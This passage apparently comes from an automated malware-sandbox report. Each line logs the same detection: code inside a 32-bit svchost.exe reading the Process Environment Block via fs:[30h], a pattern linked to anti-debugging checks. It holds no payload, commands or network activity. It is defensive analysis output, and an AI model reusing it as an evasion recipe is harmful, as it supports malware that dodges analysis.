              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392821B mov eax, dword ptr fs:[00000030h]1_2_0392821B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A200 mov eax, dword ptr fs:[00000030h]1_2_0392A200
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950230 mov ecx, dword ptr fs:[00000030h]1_2_03950230
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0227 mov eax, dword ptr fs:[00000030h]1_2_039B0227
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A22B mov eax, dword ptr fs:[00000030h]1_2_0396A22B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934180 mov eax, dword ptr fs:[00000030h]1_2_03934180
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039641BB mov ecx, dword ptr fs:[00000030h]1_2_039641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039641BB mov eax, dword ptr fs:[00000030h]1_2_039641BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E1A4 mov eax, dword ptr fs:[00000030h]1_2_0396E1A4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401C0 mov eax, dword ptr fs:[00000030h]1_2_039401C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039401F1 mov eax, dword ptr fs:[00000030h]1_2_039401F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A1E3 mov eax, dword ptr fs:[00000030h]1_2_0393A1E3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F81EE mov eax, dword ptr fs:[00000030h]1_2_039F81EE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039281EB mov eax, dword ptr fs:[00000030h]1_2_039281EB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960118 mov eax, dword ptr fs:[00000030h]1_2_03960118
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA130 mov eax, dword ptr fs:[00000030h]1_2_039BA130
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396415F mov eax, dword ptr fs:[00000030h]1_2_0396415F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A147 mov eax, dword ptr fs:[00000030h]1_2_0392A147
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936179 mov eax, dword ptr fs:[00000030h]1_2_03936179
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392A093 mov ecx, dword ptr fs:[00000030h]1_2_0392A093
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C090 mov eax, dword ptr fs:[00000030h]1_2_0392C090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6090 mov eax, dword ptr fs:[00000030h]1_2_039C6090
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04080 mov eax, dword ptr fs:[00000030h]1_2_03A04080
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039700A5 mov eax, dword ptr fs:[00000030h]1_2_039700A5
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B60A0 mov eax, dword ptr fs:[00000030h]1_2_039B60A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C0F6 mov eax, dword ptr fs:[00000030h]1_2_0392C0F6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC0E0 mov ecx, dword ptr fs:[00000030h]1_2_039BC0E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972010 mov ecx, dword ptr fs:[00000030h]1_2_03972010
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938009 mov eax, dword ptr fs:[00000030h]1_2_03938009
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960044 mov eax, dword ptr fs:[00000030h]1_2_03960044
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6040 mov eax, dword ptr fs:[00000030h]1_2_039B6040
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936074 mov eax, dword ptr fs:[00000030h]1_2_03936074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936074 mov eax, dword ptr fs:[00000030h]1_2_03936074
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE79D mov eax, dword ptr fs:[00000030h]1_2_039AE79D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov eax, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D47B4 mov ecx, dword ptr fs:[00000030h]1_2_039D47B4
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CC7B0 mov eax, dword ptr fs:[00000030h]1_2_039CC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039CC7B0 mov eax, dword ptr fs:[00000030h]1_2_039CC7B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307A7 mov eax, dword ptr fs:[00000030h]1_2_039307A7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E7E0 mov eax, dword ptr fs:[00000030h]1_2_0395E7E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393471B mov eax, dword ptr fs:[00000030h]1_2_0393471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393471B mov eax, dword ptr fs:[00000030h]1_2_0393471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395270D mov eax, dword ptr fs:[00000030h]1_2_0395270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov ecx, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952755 mov eax, dword ptr fs:[00000030h]1_2_03952755
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A750 mov eax, dword ptr fs:[00000030h]1_2_0396A750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE750 mov eax, dword ptr fs:[00000030h]1_2_039DE750
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960774 mov eax, dword ptr fs:[00000030h]1_2_03960774
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934779 mov eax, dword ptr fs:[00000030h]1_2_03934779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934779 mov eax, dword ptr fs:[00000030h]1_2_03934779
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03942760 mov ecx, dword ptr fs:[00000030h]1_2_03942760
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938690 mov eax, dword ptr fs:[00000030h]1_2_03938690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC691 mov eax, dword ptr fs:[00000030h]1_2_039BC691
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940680 mov eax, dword ptr fs:[00000030h]1_2_03940680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F86A8 mov eax, dword ptr fs:[00000030h]1_2_039F86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F86A8 mov eax, dword ptr fs:[00000030h]1_2_039F86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C66D0 mov eax, dword ptr fs:[00000030h]1_2_039C66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C66D0 mov eax, dword ptr fs:[00000030h]1_2_039C66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE6D0 mov eax, dword ptr fs:[00000030h]1_2_039DE6D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039306CF mov eax, dword ptr fs:[00000030h]1_2_039306CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA6C0 mov eax, dword ptr fs:[00000030h]1_2_039FA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D86C2 mov eax, dword ptr fs:[00000030h]1_2_039D86C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC6F2 mov eax, dword ptr fs:[00000030h]1_2_039AC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC6F2 mov eax, dword ptr fs:[00000030h]1_2_039AC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C6E0 mov eax, dword ptr fs:[00000030h]1_2_0393C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039566E0 mov eax, dword ptr fs:[00000030h]1_2_039566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039566E0 mov eax, dword ptr fs:[00000030h]1_2_039566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04600 mov eax, dword ptr fs:[00000030h]1_2_03A04600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930630 mov eax, dword ptr fs:[00000030h]1_2_03930630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960630 mov eax, dword ptr fs:[00000030h]1_2_03960630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov esi, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov eax, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B8633 mov eax, dword ptr fs:[00000030h]1_2_039B8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C620 mov eax, dword ptr fs:[00000030h]1_2_0396C620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov eax, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov ecx, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396265C mov eax, dword ptr fs:[00000030h]1_2_0396265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C640 mov eax, dword ptr fs:[00000030h]1_2_0396C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C640 mov eax, dword ptr fs:[00000030h]1_2_0396C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930670 mov eax, dword ptr fs:[00000030h]1_2_03930670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972670 mov eax, dword ptr fs:[00000030h]1_2_03972670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972670 mov eax, dword ptr fs:[00000030h]1_2_03972670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov esi, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov eax, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396666D mov eax, dword ptr fs:[00000030h]1_2_0396666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE660 mov eax, dword ptr fs:[00000030h]1_2_039BE660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962594 mov eax, dword ptr fs:[00000030h]1_2_03962594
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC592 mov eax, dword ptr fs:[00000030h]1_2_039BC592
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE588 mov eax, dword ptr fs:[00000030h]1_2_039AE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE588 mov eax, dword ptr fs:[00000030h]1_2_039AE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A580 mov eax, dword ptr fs:[00000030h]1_2_0396A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A580 mov eax, dword ptr fs:[00000030h]1_2_0396A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039345B0 mov eax, dword ptr fs:[00000030h]1_2_039345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039345B0 mov eax, dword ptr fs:[00000030h]1_2_039345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B85AA mov eax, dword ptr fs:[00000030h]1_2_039B85AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039665D0 mov eax, dword ptr fs:[00000030h]1_2_039665D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5C6 mov eax, dword ptr fs:[00000030h]1_2_0396C5C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05C6 mov eax, dword ptr fs:[00000030h]1_2_039B05C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC5FC mov eax, dword ptr fs:[00000030h]1_2_039BC5FC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5E7 mov ebx, dword ptr fs:[00000030h]1_2_0396A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5E7 mov eax, dword ptr fs:[00000030h]1_2_0396A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DE5E0 mov eax, dword ptr fs:[00000030h]1_2_039DE5E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC51D mov eax, dword ptr fs:[00000030h]1_2_039BC51D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E507 mov eax, dword ptr fs:[00000030h]1_2_0395E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932500 mov eax, dword ptr fs:[00000030h]1_2_03932500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C50D mov eax, dword ptr fs:[00000030h]1_2_0396C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C50D mov eax, dword ptr fs:[00000030h]1_2_0396C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972539 mov eax, dword ptr fs:[00000030h]1_2_03972539
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394252B mov eax, dword ptr fs:[00000030h]1_2_0394252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6550 mov eax, dword ptr fs:[00000030h]1_2_039C6550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA553 mov eax, dword ptr fs:[00000030h]1_2_039FA553
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E547 mov eax, dword ptr fs:[00000030h]1_2_0394E547
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966540 mov eax, dword ptr fs:[00000030h]1_2_03966540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968540 mov eax, dword ptr fs:[00000030h]1_2_03968540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393254C mov eax, dword ptr fs:[00000030h]1_2_0393254C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C560 mov eax, dword ptr fs:[00000030h]1_2_0394C560
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC490 mov eax, dword ptr fs:[00000030h]1_2_039BC490
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930485 mov ecx, dword ptr fs:[00000030h]1_2_03930485
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396648A mov eax, dword ptr fs:[00000030h]1_2_0396648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C84BB mov eax, dword ptr fs:[00000030h]1_2_039C84BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4BC mov eax, dword ptr fs:[00000030h]1_2_0396E4BC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039324A2 mov eax, dword ptr fs:[00000030h]1_2_039324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039324A2 mov ecx, dword ptr fs:[00000030h]1_2_039324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644A8 mov eax, dword ptr fs:[00000030h]1_2_039644A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039544D1 mov eax, dword ptr fs:[00000030h]1_2_039544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039544D1 mov eax, dword ptr fs:[00000030h]1_2_039544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364F0 mov eax, dword ptr fs:[00000030h]1_2_039364F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D44F8 mov eax, dword ptr fs:[00000030h]1_2_039D44F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D44F8 mov eax, dword ptr fs:[00000030h]1_2_039D44F8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A4F0 mov eax, dword ptr fs:[00000030h]1_2_0396A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A4F0 mov eax, dword ptr fs:[00000030h]1_2_0396A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE4F2 mov eax, dword ptr fs:[00000030h]1_2_039BE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE4F2 mov eax, dword ptr fs:[00000030h]1_2_039BE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4EF mov eax, dword ptr fs:[00000030h]1_2_0396E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E4EF mov eax, dword ptr fs:[00000030h]1_2_0396E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6400 mov eax, dword ptr fs:[00000030h]1_2_039C6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6400 mov eax, dword ptr fs:[00000030h]1_2_039C6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392640D mov eax, dword ptr fs:[00000030h]1_2_0392640D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E45E mov eax, dword ptr fs:[00000030h]1_2_0395E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940445 mov eax, dword ptr fs:[00000030h]1_2_03940445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0443 mov eax, dword ptr fs:[00000030h]1_2_039B0443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938470 mov eax, dword ptr fs:[00000030h]1_2_03938470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938470 mov eax, dword ptr fs:[00000030h]1_2_03938470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE461 mov eax, dword ptr fs:[00000030h]1_2_039BE461
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA464 mov eax, dword ptr fs:[00000030h]1_2_039FA464
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8BBE mov eax, dword ptr fs:[00000030h]1_2_039F8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04BE0 mov eax, dword ptr fs:[00000030h]1_2_03A04BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D6BDE mov ebx, dword ptr fs:[00000030h]1_2_039D6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D6BDE mov eax, dword ptr fs:[00000030h]1_2_039D6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958BD1 mov eax, dword ptr fs:[00000030h]1_2_03958BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03958BD1 mov eax, dword ptr fs:[00000030h]1_2_03958BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EBC0 mov eax, dword ptr fs:[00000030h]1_2_0392EBC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4BC0 mov eax, dword ptr fs:[00000030h]1_2_039B4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938B10 mov eax, dword ptr fs:[00000030h]1_2_03938B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940B10 mov eax, dword ptr fs:[00000030h]1_2_03940B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB1C mov eax, dword ptr fs:[00000030h]1_2_0395EB1C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB1E mov eax, dword ptr fs:[00000030h]1_2_0392CB1E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CB20 mov eax, dword ptr fs:[00000030h]1_2_0396CB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCB20 mov eax, dword ptr fs:[00000030h]1_2_039BCB20
